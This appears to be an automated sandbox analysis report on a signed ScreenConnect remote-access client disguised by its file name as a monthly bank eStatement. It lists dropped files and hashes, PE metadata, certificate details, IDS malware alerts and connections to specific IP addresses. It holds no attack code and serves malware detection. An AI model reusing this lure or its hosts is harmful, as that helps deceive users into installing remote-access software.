                                                                                                                                                                                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1982
                                                                                                                                                                                                                                                  Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                  MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                  SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                  SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                  SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):61216
                                                                                                                                                                                                                                                  Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                  MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                  SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                  SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                  SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):601376
                                                                                                                                                                                                                                                  Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                  MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                  SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                  SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                  SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2573
                                                                                                                                                                                                                                                  Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                  MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                  SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                  SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                  SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17866
                                                                                                                                                                                                                                                  Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                  MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                  SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                  SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                  SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):81696
                                                                                                                                                                                                                                                  Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                  MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                  SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                  SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                  SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):87
                                                                                                                                                                                                                                                  Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                  MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                  SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                  SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                  SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                  Entropy (8bit):4.4216564290401905
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:zSvfpi6ceLP/9skLmb0OTTWSPHaJG8nAgeMZMMhA2fX4WABlEnNp0uhiTw:+vloTTW+EZMM6DFyn03w
                                                                                                                                                                                                                                                  MD5:1A005DC6D650343D501A917C790F5063
                                                                                                                                                                                                                                                  SHA1:DBBADBFBE5FC4F9A3F4ADD821B0B3267E5481563
                                                                                                                                                                                                                                                  SHA-256:C6A1EB0822C98479186D29EAAA2F98957EE3B6D66682D99144BBEB2F38D77D7D
                                                                                                                                                                                                                                                  SHA-512:49B836559976B49B673CE21D055EBFA4E18DE794D1ECA96CE019CCC0F68012505708DA8D95F8E44E29645741A1A5C1A13274A4A4A4150642EDFD65D40B1102DF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Entropy (8bit):6.514403774293619
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                  File name:monthly-eStatementForum120478962.Client.exe
File size: 83'376 bytes
MD5: 27bd2490fd75556aab2df57ea7c1147f
SHA1: 4eb9656ede1fed23fdaeb67815afcd489ded0f77
SHA256: 7d6376247db9e267f27d1d6bf32b48afcab0ad277706fc0135d803645f7852a5
SHA512: b70743c0c03cad64c9f258db7de324ca083ec15ad922f16460febbe47f018aedcbf83e39d8f2b4a57ff77d71727e11a2585264de9dadb15f0ea18abe1e34b350
SSDEEP: 1536:JoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYX7gxD:TenkyfPAwiMq0RqRfbaxZJYYX
TLSH: 0F835B43B5E18875E9730E3118B1D9B4593FBD110EA48EAF3398426A0F351D19E3AE7B
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x401489
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 37d5c89163970dd3cc69230538a1b72b
Signature Valid: true
Signature Issuer: CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error: The operation completed successfully
Error Number: 0
Not Before: 17/08/2022 02:00:00
Not After: 16/08/2025 01:59:59
Subject Chain:
• CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version: 3
Thumbprint MD5: AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1: 4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256: 82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial: 0B9360051BCCF66642998998D5BA97CE
Programming Language:
• [IMP] VS2008 SP1 build 30729

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1060c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11800 | 0x2db0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14000 | 0xddc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xfe38 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xfd78 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9cf8 | 0x9e00 | bae4521030709e187bdbe8a34d7bf731 | False | 0.6035650712025317 | data | 6.581464957368758 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb000 | 0x5d58 | 0x5e00 | ec94ce6ebdbe57640638e0aa31d08896 | False | 0.4178025265957447 | Applesoft BASIC program data, first line number 1 | 4.843224204192078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x11cc | 0x800 | 04a548a5c04675d08166d3823a6bf61b | False | 0.16357421875 | data | 2.0120795802951505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x13000 | 0x1e0 | 0x200 | aa256780346be2e1ee49ac6d69d2faff | False | 0.52734375 | data | 4.703723272345726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x14000 | 0xddc | 0xe00 | 908329e10a1923a3c4938a10d44237d9 | False | 0.7776227678571429 | data | 6.495696626464028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x13060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727

DLL | Import
KERNEL32.dll | LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
CRYPT32.dll | CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-08T11:01:13.781744+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.5 | 49722 | TCP
2024-11-08T11:01:15.767488+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.5 | 49724 | TCP
2024-11-08T11:01:18.080245+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.5 | 49729 | TCP
2024-11-08T11:01:21.003552+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.5 | 49736 | TCP
2024-11-08T11:01:22.684812+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.5 | 49743 | TCP
2024-11-08T11:01:25.138450+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.5 | 49756 | TCP
2024-11-08T11:01:26.702035+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.5 | 49767 | TCP
2024-11-08T11:01:32.679860+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.5 | 49802 | TCP
2024-11-08T11:01:37.035829+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 194.59.30.201 | 443 | 192.168.2.5 | 49818 | TCP
2024-11-08T11:01:55.669523+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.5 | 49930 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:13.550318956 CET49722443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:13.665772915 CET44349722194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:13.665796041 CET44349722194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:13.665858984 CET49722443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:13.665875912 CET44349722194.59.30.201192.168.2.5
